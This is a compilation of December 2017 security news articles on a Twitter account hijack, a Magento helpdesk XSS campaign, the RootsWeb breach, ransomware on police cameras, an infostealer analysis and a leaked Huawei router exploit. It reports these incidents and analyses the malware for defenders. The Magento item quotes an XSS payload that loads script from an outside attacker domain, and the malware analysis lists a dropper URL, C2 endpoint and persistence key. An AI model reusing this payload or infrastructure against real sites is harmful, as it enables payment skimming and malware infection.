John McAfee
✔
@officialmcafee
Urgent: My account was hacked. Twitter has been notified. The coin of the day tweet was not me. As you all know... I am not doing a coin of the day anymore!!!!
The Twitter account of the popular security expert John McAfee was hacked
30.12.2017 securityaffairs Social
The official Twitter account of popular cyber security expert John McAfee was hacked today, hackers used it to promote alternative cryptocurrencies.
The official Twitter account of legendary security expert John McAfee was hacked today, attackers used it to send several tweets promoting alternative cryptocurrencies like Siacoin, NXT, XRP, PTOY, and BAT.
At the time of writing, there aren’t further info related to the attack, John McAfee explained that its account was protected with a two-factor authentication process.
This suggests that the attackers have found a way to obtain the authentication code sent by Twitter, this is possible by compromising the mobile device or via an SS7 attack.
In this latter scenario, hackers can exploit a flaw in the SS7 protocol to steal the victim’s identity on the messaging services with just basic skills.
The principal instant messaging services, including WhatsApp and Telegram, rely on the SMS authentication as the primary security verification mechanism, which is routed through SS7 signalling. This means that hackers exploit the SS7 to compromise the verification mechanism and take over the victim’s account and impersonate him.
According to McAfee, someone has compromised his smartphone.
28 Dec
Adam Eivy \[._.]/
@antic
Replying to @officialmcafee
So how did it happen? Was this a breach of twitter, of your 2-factor service (e.g. phone provider). Did you not have 2-factor on for some reason? Curious if this is something that could affect others.
John McAfee
✔
@officialmcafee
If it can affect me it can affect anyone. Most likely my phone was compromised
4:40 AM - Dec 28, 2017
24 24 Replies 2 2 Retweets 28 28 likes
Twitter Ads info and privacy
John McAfee
✔
@officialmcafee
Urgent: My account was hacked. Twitter has been notified. The coin of the day tweet was not me. As you all know... I am not doing a coin of the day anymore!!!!
12:04 AM - Dec 28, 2017
3,922 3,922 Replies 2,726 2,726 Retweets 7,997 7,997 likes
Twitter Ads info and privacy
“The first indication that I had been hacked was turning on my cell phone and seeing the attached image,” he told BBC.
McAfee added that he was on a boat when his account was hacked and for this reason, he was not able to contact the AT&T.
“I knew at that point that my phone had been compromised.” he added
“I was on a boat at the time and could not go to my carrier (AT&T) to have the issue corrected.
“All that the hacker did was compromise my Twitter account. It could have been worse.”
John knows very well that he is a privileged target of several types of attackers, including haters.
John McAfee
✔
@officialmcafee
Though I am a security expert, I have no control over Twitter's security. I have haters. I am a target. People make fake accounts, fake screenshots, fake claims. I am a target for hackers who lost money and blame me. Please take responsibility for yourselves. Adults only please.
4:32 AM - Dec 28, 2017
1,368 1,368 Replies 798 798 Retweets 6,453 6,453 likes
Twitter Ads info and privacy
McAfee’s account was fully restored, Twitter hasn’t commented the incident.
The reality is that is not complex for a persistent attacker to compromise your social media account.
Hackers are attempting to breach Magento stores through the Mirasvit Helpdesk extension
30.12.2017 securityaffairs Hacking
The cybersecurity expert Willem de Groot reported cyber attacks against Magento websites running the popular helpdesk extension ‘Mirasvit Helpdesk.’
de Groot observed attackers sending a message like this to Magento merchants:
Hey, I strongly recommend you to make a redesign! Please contact me if you need a good designer! – knockers@yahoo.com
The message contains a specially crafted sender that triggers an XSS attack.
“Upon closer examination, the message contains a specially crafted sender that contains an XSS attack: an attempt to take control of the backend of a Magento store (archived copy here):”
<script src="https://helpdeskjs.com/jquery.js"></script>@gmail.com
“This exploits a flaw in the popular Mirasvit Helpdesk extension. When a helpdesk agent opens the ticket, it will run the code in the background, in the browser of the agent.” wrote de Groot.
The attack exploits one of the flaws discovered in September 2017 by the researchers at the security firm WebShield that affected all versions of the Mirasvit Helpdesk extension until 1.5.2. The company addressed the issued with the release of the version 1.5.3.
When a helpdesk agent opens the ticket, it will run the code for the XSS attack in the background, then a malicious code is added to the footer of the Magento template. In this way, the attacker is able to get its code executed on any page accessed by visitors. The malware used in the attacks spotted by the expert was designed to intercept payments data and send it offshore as the customer types it into the payment form.
“Ultimately, the malware intercepts payments data and send it offshore as the customer types it into the payment form.” de Groot added.
“This attack is particularly sophisticated, as it is able to bypass many security measures that a merchant might have taken. For example, IP restriction on the backend, strong passwords, 2-Factor-Authentication and using a VPN tunnel will not block this attack.”
de Groot suggested to run the following query on the database to find XSS attacks:
SELECT *
FROM `m_helpdesk_message`
WHERE `customer_email` LIKE '%script%'
OR `customer_name` LIKE '%<script%'
OR `body` LIKE '%<script%' \G
and search access logs for modifications of templates through the backend:
$ grep system_config/save/section/design access.log
The expert also published a copy of the malware on GitHub.
Mirasvit published a blog post warning its customers and urging them to update their installs.
Ancestry.com Responds Well To RootsWeb Data Breach
30.12.2017 securityaffairs Incindent
The popular expert Troy Hunt notified the Ancestry.com security team of an unsecured file on a RootsWeb server containing “email addresses/username and password combinations as well as usernames from a RootsWeb.com server”.
When you think of personal security questions, you might think of your mother’s surname or other family information that normally isn’t shared — unless you are building your family tree with an online genealogy search. When Ancestry.com notifies its users of a potential security breach it sounds worse than most.
Ancestry.com is a company with millions of customers that use their online tools to research their family tree. The company also hosts servers for RootsWeb, a free, community-driven collection of genealogy tools and discussion forums. On December 20th, 2017, Troy Hunt, of HaveIBeenPwned.com, notified the Ancestry.com security team of an unsecured file on a RootsWeb server containing “email addresses/username and password combinations as well as usernames from a RootsWeb.com server”, and a quick and detailed investigation ensued.
According to Ancestry.com’s blog post detailing the incident, the security team reviewed the file identified by Hunt, and determined that it does contain login details for 300,000 accounts although they describe, “the majority of the information was old.” They continued their investigation and determined that of the 300,000 accounts, 55,000 had been reused by users on both the RootsWeb and Ancestry websites. Most of the 55,000 were “from free trial, or currently unused accounts,” but 7,000 login credentials were in use by active Ancestry.com users. Ancestry.com supports millions of users so this breach represents less than 1% of their users, however, they still took the potential impacts seriously and acted accordingly.
The internal investigation points to the RootsWeb surname list information service which Ancestry.com retired earlier this year. “We believe the intrusion was limited to the RootsWeb surname list, where someone was able to create the file of older RootsWeb usernames and passwords as a direct result of how part of this open community was set up, an issue we are working to rectify”, according to the blog post by Ancestry.com CISO, Tony Blackman.
He continued with, “We have no reason to believe that any Ancestry systems were compromised. Further, we have not seen any activity indicating the compromise of any individual Ancestry accounts.” According to Ancestry, the RootsWeb servers do not host any credit card or social insurance numbers so the potential impact of this breach appears to be minimized.
The RootsWeb website is currently offline while the Ancestry teams complete their investigation, make the appropriate configuration changes and “ensure all data is saved and preserved to the best of [their] ability.”
In addition, the Ancestry has locked the 55,000 accounts found in the exposed file, requiring users to change their passwords the next time they attempt to log on. They sent emails to all 55,000 email addresses advising them of the incident and recommended actions, and commit to “working with regulators and law enforcement where appropriate.”
To summarize, the Ancestry.com security team responded quickly when notified of a potential breach, determined the potential scope and impact, took swift action to minimize damages, notified impacted users, clearly and publicly described the event. Troy Hunt’s tweet describes it best, “Another data breach from years ago, this time from @Ancestry’s services. Really impressed with the way they handled this: I got in touch with them bang on 72 hours ago and they’ve handled it in an exemplary fashion.”
Troy Hunt
✔
@troyhunt
Another data breach from years ago, this time from one of @Ancestry's services. Really impressed with the way they handled this: I got in touch with them bang on 72 hours ago and they've handled it in an exemplary fashion https://blogs.ancestry.com/ancestry/2017/12/23/rootsweb-security-update/ …
Two Romanians charged with infecting US Capital Police cameras with ransomware early this year
30.12.2017 securityaffairs Ransomware
Two Romanian people have been arrested and charged with hacking into US Capital Police cameras ahead of the inauguration of President Trump.
Two Romanian people have been arrested and charged with hacking into control systems of the surveillance cameras for the Metropolitan Police Department in the US. The two suspects, Mihai Alexandru Isvanca, 25, and Eveline Cismaru, 28, hacked the US Capital Police cameras earlier this year.
A ransomware infected 70 percent of storage devices used by the Washington DC CCTV systems just eight days before the inauguration of President Donald Trump.
The attack occurred between 12 and 15 January, the ransomware infected 123 of 187 network video recorders, each controlling up to four CCTVs. IT staff was forced to wipe the infected systems in order to restore the situation, fortunately, the ransomware did not affect other components of the Washington DC network.
The first infections were discovered by the Police on Jan. 12 D.C. when the authorities noticed four camera sites were not functioning properly. Experts at the city technology office detected two distinct ransomware (Cerber and Dharma) in four recording devices, then they extended the analysis to the entire surveillance network and wiped all the infected equipment.
The duo was arrested in Bucharest on December 15 and charged with conspiracy and various forms of computer fraud.
According to an affidavit dated December 11, the two criminals acted in an effort “to extort money” in exchange for unlocking the surveillance system.
Prosecutors collected evidence that revealed a scheme to distribute ransomware by email to at least 179,000 email addresses.
“The investigation uncovered information that the MPD surveillance camera computers were compromised between Jan. 9 and Jan. 12, 2017, and that ransomware variants called “cerber” and “dharma” had been stored on the computers. Other evidence in the investigation revealed a scheme to distribute ransomware by email to at least 179,000 email addresses. ” reads the press release published by the DoJ.
Isvanca remains in custody in Romania and Cismaru is under house arrest pending further legal proceedings, the maximum penalty for a conspiracy to commit wire fraud is 20 years in prison.
Info Stealing – The cyber security expert Marco Ramilli spotted a new operation in the wild
30.12.2017 securityaffairs Cyber
The Italia cyber security expert Marco Ramilli, founder of Yoroi, published an interesting analysis of a quite new InfoStealer Malware delivered by eMail to many International Companies.
Attack attribution is always a very hard work. False Flags, Code Reuse and Spaghetti Code makes impossible to assert “This attack belongs to X”. Indeed nowadays makes more sense talking about Attribution Probability rather then Attribution by itself. “This attack belongs to X with 65% of attribution probability” it would be a correct sentence.
I made this quick introduction because the following analysis would probably take the reader to think about specific attribution, but it won’t be so accurate, so please be prepared to have not such a clear conclusions.
Today I’d like to show an interesting analysis of a quite new InfoStealer Malware delivered by eMail to many International Companies. The analysis shows up interesting Code Reuse capabilities, apparently originated by Japanese Attackers reusing an English Speaker Attacker source code. Again I have not enough artifacts to give attributions but only few clues as follows. In the described analysis, the original sample was delivered by sarah@labaire.co.za (with high probability a compromised South Africa account) to one of my spamming email addresses.
The obtained sample is a Microsoft Word document within macro in it. The macros were heavily obfuscated by using four rounds of substitutions and UTF-8 encoding charsets (which, by the way, is super annoying). The following image shows the obfuscated macro code with UTF-8 charsets.
Stage 1: Obfuscation
By using oletools and “tons” of cups of coffee (to be awake until late night to make recursive steps) I finally was able to extract the invoked command, showed in the following image.
Stage 1: Invoked Command
A fashionable powershell command drops and executes: hxxp://ssrdevelopments.co.za/a2/off.exe. Powershell seems to be a “must have” in contemporary Malware. Analyzing the “dropping” url and tracking down the time it is in “Index Of” mode (2017-0-13), I suspect it is not a compromised website rather a crafted web server or a compromised host of a dead company.
Info Stealing
Dropping Web Site
By surfing the Malware propagator website I founded out many malicious executables (sees IoC section) each one showing up specific behaviors such as: password stealers, RAT, and Banking Trojans. Even if the samples were developed for different targets, all of them shared the following basic behaviors:
Check for victims IP address before getting into Malicious activities (maybe related to targeted activities)
Install itself into auto execution path
Tries to fingerprint the target system (such as CPU, HD, Memory, Username, System, etc..)
Sniff for Keystrokes
I’d like to write a simple analysis for each found sample, but today time is not my friend, so let’s focalize to one of the malicious samples. Let’s get done the received sample by digging into the “second stage” dropped by the pPowerShell “first stage” from ssrdevelopments.co.za/a2/off.exe. After few seconds on second stage (off.exe) it became clear that it was a .NET software. By reversing the interpreted .NET language some clear text comments appeared interesting. Japanese language such as comments and variable names came out from static analysis. Let’s have a look to them.
Stage 2: Apparently Japanese characters
While the sample pretends to be compiled from “Coca-Cola Enterprise” (maybe a target operation against Coca-Cola ? Or a targeted operation agains Coca-Cola Suppliers ? So why it ended up to my inbox ? Anyway … ) google translator suggests me that Japanese characters are in text: such as the “Entry Point”, “Class names” and “Function Names”.
Stage 2: Japanese Names and Self Encoding Structures
It was not hard to figure out that Stage 2 was auto-extracting bytes from itself (local variables) and saving them back to hard drive after having set up auto execution registry key on windows local registry. The following image shows the xoring function used to decrypt converted bytes to the real payload.
Stage 2: Xoring function to extract Stage 3
On my run, the xored payload took the name of GIL.exe; another .NET executable. We are now facing the third stage. By analyzing the decompiled sample it became clear that:
The coding style was quite different from the previous stage (Stage 2)
The implementation style was different from the previous stage as well
The sample was interested in information about the user, the machine, the web services on the PC and to many more windows specific parameters.
Stage 3: New Language in Strings and Class names
Stage 3: New Code Style
By closely investigating Stage 3, the analyst would probably notice the heavy presence of “decorators”, a different format in the definition style and last but not least the core composition. Everything looks like belonging to different single developers. The variable language, the comments structure and the general usage of terms, takes the analyst to believe in having found two different developers belonging to different cultures (maybe countries). Finally the malware looks for users, computes, and web services informations and drops everything up to C2 by posting parameters to : ssrdevelopments.co.za/cgi-bin/
IoC:
Following the principal IoC for the described threat.
Hash Stage 1:
7f1860673de9b1c2e6f7d6963a499e8ba4e412a1
bf4a26c9e52a8cacc7afd7d95d197bff1e47fb00
Hash Stage 2:
ac55ee783f3ed0bd23eccd01040a128dc6dc7851
Hash Stage 3:
6a38e4acd9ade0d85697d10683ec84fa0daed11c
Persistence: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\kij %APPDATA%\Roaming\kij\kij.exe
Dropping URL:
ssrdevelopments.co.za
Command and Control:
ssrdevelopments.co.za/cgi-bin/
Related hashes from harvesting Dropping URL:
62c9d2ae7bafa9c594230c570b66ec2d4fa674a6
b15b69170994918621ceb33cb339149bdff5b065
55abcfb85e664fbc8ad1cb8b60a08409c2d26caa
f843427e9b7890f056eaa9909a5103bba6ffb8fd
f2b81e66fcb1032238415b83b75b3fe8bf28247d
cab90f7c935d355172b0db123d20b6a7d1403f65
c1ba30d7adec6d545d5274f95943f787ad4c03e7
ed9959bb0087f2c985b603cee0e760f3e0faaab15
c93851627ffd996443f85d916f3dbedd70e0ff69
144b34b4816062c2308a755273159e0460ffd604
98293b80ccf312a8da99c2b5ca36656adebd0d0f
2875d1b54337b1c17c8f4cd5f6b2d579667ee3d9
0b4299ffb3f9aa59e19dd726e79d95365fe1d461
46bb0b10d790a3f21867308e7dcdeb06784a1570
0960726560a94fbbb327aa84244f9588a3c68be8
a480a75c3af576e5656abadb47d11515a18a82be
2ba809c53eda2a475b1353c34f87ce62b6496e16
5b0c3071aa63e18aa91af59083223d3cceb0fa3c
dc780bf338053e9c1b0fdf259c831eb8a2768169
As final thought I’d like to highlight the following key concept of that analysis:
From a single email, the analyst could discover attacker’s assets, mapping them and disarming them (through IoC).
The analyzed code shows apparent evidences to belonging to different groups of attackers.
The analyzed samples show code reuse. Code reuse is dangerous because it makes attackers more powerful and extremely quick to change Malware behavior.
Hope you enjoyed.
The original post published by Marco Ramilli on his blog at the following URL:
https://marcoramilli.blogspot.it/2017/12/info-stealing-new-operation-in-wild.html
Huawei router exploit (CVE-2017-17215) involved in Satori and Brickerbot was leaked online
30.12.2017 securityaffairs Exploit
The exploit code used to trigger the CVE-2017-17215 vulnerability in Huawei routers over the past several weeks is now publicly available.
Before Christmas, the Mirai botnet made the headlines once again, a new variant dubbed Satori was responsible for hundreds of thousands of attempts to exploit a recently discovered vulnerability in Huawei HG532 home routers.
The activity of the Satori botnet has been observed over the past month by researchers from Check Point security.
Satori is an updated variant of the notorious Mirai botnet that was first spotted by the malware researchers MalwareMustDie in August 2016. The malicious code was developed to target IoT devices, the Satori version targets port 37215 on Huawei HG532 devices.
The attacks against Huawei HG532 devices were observed in several countries, including the USA, Italy, Germany, and Egypt.
Experts observed that attacks attempt to exploit the CVE-2017-17215 zero-day vulnerability in the Huawei home router residing in the fact that the TR-064 technical report standard, which was designed for local network configuration, was exposed to WAN through port 37215 (UPnP – Universal Plug and Play).
News of the day is that the code used to target the Huawei routers over the past several weeks is now publicly available.
The discovery was made by Ankit Anubhav, a researcher at security firm NewSky.
Anubhav first discovered the code on Pastebin.com early this week.
“NewSky Security observed that a known threat actor released working code for Huawei vulnerability CVE-2017–17215 free of charge on Pastebin this Christmas. This exploit has already been weaponized in two distinct IoT botnet attacks, namely Satori and Brickerbot.” states a blog post published by Anubhav.
The exploit code for the CVE- 2017-17215 was used by a hacker identified as “Nexus Zeta” to spread the Satori bot (aka Okiku).
The availability of the code online represents a serious risk, it could become a commodity in the criminal underground, vxers could use it to build their botnet.
Satori isn’t the only botnet leveraging the CVE-2017-17215 exploit code, earlier in December, the author of the Brickerbot botnet that goes online with the moniker “Janitor” released a dump which contained snippets of Brickerbot source code.
NewSky Security analyzing the code discovered the usage of the exploit code CVE-2017–17215, this means that the code was available in the underground for a long.
“Let us compare this with a binary of Satori botnet (in the image below). Not only we see the same attack vector i.e. code injection in <NewStatusURL>, but also, we witness the other indicator “echo HUAWEIUPNP“ string, implying that both Satori and Brickerbot had copied the exploit source code from the same source.” continues NewSky.
This is not the first time that IoT botnets leverage issues related to the SOAP protocol. Earlier this year, security experts observed several Mirai-based botnets using two other SOAP bugs (CVE-2014–8361 and TR-64) which are code injections in <NewInternalClient> and <NewNTPServer> respectively.
Back to the present, Huawei provided a list of mitigation actions for this last wave of attacks that includes configuring a router’s built-in firewall, changing the default password or using a firewall at the carrier side.
I avoided to provide the link to the code published on Pastebin, but it is very easy to find it with the proper query.
China Has Shut Down 13,000 Websites Since 2015: Xinhua
30.12.2017 securityweek BigBrothers
China has shut down or revoked the licenses of 13,000 websites since 2015 for violating the country's internet rules, state media reported Sunday.
The news comes as the Communist country continues to strengthen its already tight regulation of the internet, a move which critics say has picked up pace since President Xi Jinping came to power in 2012.
Platforms have also closed nearly 10 million internet accounts for "violating service protocol", the official news agency said Sunday, likely referring to social media accounts.
"These moves have a powerful deterrent effect," Xinhua quoted Wang Shengjun, vice chairman of the Standing Committee of the National People's Congress (NPC), as saying.
Despite being home to the world's largest number of internet users, a 2015 report by US think tank Freedom House found that the country had the most restrictive online use policies of 65 nations it studied, ranking below Iran and Syria.
This year alone, it has enacted new rules requiring foreign tech companies to store user data inside the country, imposed fresh content restrictions, and made it increasingly difficult to use software tools that allow users to circumvent censors.
Google, Facebook, Twitter and The New York Times are all blocked in China, among countless other foreign websites.
Beijing strictly defends what it calls "cyber sovereignty" and maintains that its various forms of web censorship -- collectively known as "The Great Firewall" -- are necessary for protecting its national security.
Within China, websites must register with authorities and are responsible for "ensuring the legality of any information" posted on their platforms, according to regulations in force since 2000.
When their content runs afoul of authorities, they can be shutdown or fined.
One way to bypass the strictly controlled domestic internet is by using a virtual private network (VPN) which can allow users to access the unfiltered global internet. But here too authorities have cracked down.
Earlier this week, Wu Xiangyang from the southern Guangxi Zhuang autonomous region was sentenced to five and a half years in prison for selling a VPN service on Alibaba's Taobao and other marketplaces.
Two Romanians Charged With Hacking US Capital Police Cameras
30.12.2017 securityweek Crime
Two Romanian nationals have been arrested and charged with hacking into computer systems which controlled surveillance cameras for the Metropolitan Police Department in the US capital earlier this year, officials said Thursday.
A criminal complaint unsealed in Washington said the two -- Mihai Alexandru Isvanca, 25, and Eveline Cismaru, 28 -- were arrested in Bucharest on December 15 and charged with conspiracy and various forms of computer fraud.
The Justice Department said the pair managed to disable 123 of the police department's 187 outdoor surveillance cameras in early January by infecting computer systems with ransomware -- an effort "to extort money" in exchange for unlocking the computer, according to an affidavit filed in court.
The case "was of the highest priority" because it impacted efforts to plan security ahead of the 2017 presidential inauguration, according to officials.
The Secret Service and other agencies "quickly ensured that the surveillance camera system was secure and operational" and the investigation found no security threats as a result of the scheme.
Isvanca remains in custody in Romania and Cismaru is on house arrest there pending further legal proceedings, the Justice Department said.